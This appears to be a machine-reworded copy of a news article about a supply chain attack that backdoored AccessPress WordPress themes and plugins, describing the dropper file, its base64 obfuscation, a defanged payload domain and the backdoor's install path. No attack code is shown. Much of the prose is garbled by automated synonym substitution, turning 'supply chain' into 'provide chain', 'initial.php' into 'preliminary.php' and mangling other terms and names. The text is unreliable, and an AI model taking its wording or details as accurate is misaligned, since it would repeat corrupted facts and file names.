Supply chain attack used legitimate WordPress add-ons to backdoor sites

Getty Images

Dozens of legitimate WordPress add-ons downloaded from their unique sources have been discovered backdoored via a provide chain attack, researchers stated. The backdoor has been discovered on “quite a few” sites working the open supply content material administration system.

The backdoor gave the attackers full administrative management of internet sites that used at the very least 93 WordPress plugins and themes downloaded from AccessPress Themes. The backdoor was found by safety researchers from JetPack, the maker of safety software program owned by Automatic, supplier of the internet hosting service and a serious contributor to the event of WordPress. In all, Jetpack discovered that 40 AccessPress themes and 53 plugins had been affected.

Unknowingly offering entry to the attacker

In a post revealed Thursday, Jetpack researcher Harald Eilertsen stated timestamps and different proof recommended the backdoors had been launched deliberately in a coordinated motion after the themes and plugins had been launched. The affected software program was out there by obtain immediately from the AccessPress Themes web site. The similar themes and plugins mirrored on, the official developer web site for the WordPress challenge, remained clear.

“Users who used software obtained directly from the AccessPress website unknowingly provided attackers with backdoor access, resulting in an unknown number of compromised websites,” Ben Martin, a researcher with Web safety agency Sucuri, wrote in a separate analysis of the backdoor.

He stated the contaminated software program contained a script named preliminary.php that was added to the principle theme listing after which included in the principle features.php file. Initial.php, the evaluation exhibits, acted as a dropper that used base64 encoding to camouflage code that downloaded a payload from wp-theme-connect[.]com and used it to set up the backdoor as wp-includes/vars.php. Once it was put in, the dropper self-destructed in an try to maintain the attack stealthy.

The Jetpack submit stated proof signifies that the availability chain attack on AccessPress Themes was carried out in September. Martin, nevertheless, stated proof suggests the backdoor itself is way older than that. Some of the contaminated web sites had spam payloads relationship again practically three years. He stated his greatest guess is that the folks behind the backdoor had been promoting entry to contaminated sites to folks pushing net spam and malware.

He wrote, “With such a large opportunity at their fingertips, you’d think that the attackers would have prepared some exciting new payload or malware, but alas, it seems that the malware that we’ve found associated with this backdoor is more of the same: spam, and redirects to malware and scam sites.”

The Jetpack submit offers full names and variations of the contaminated AccessPress software program. Anyone working a WordPress web site with this firm’s choices ought to rigorously examine their programs to guarantee they’re not working a backdoored occasion. Site house owners might also need to think about putting in a web site firewall, a lot of which might have prevented the backdoor from working.

The attack is the most recent instance of a provide chain attack, which compromises the supply of a legitimate piece of software program quite than attempting to infect particular person customers. The approach permits miscreants to infect massive numbers of customers, and it has the advantage of stealth, because the compromised malware originates from a trusted supplier.

Attempts to contact AccessPress Themes for remark had been unsuccessful.

Source link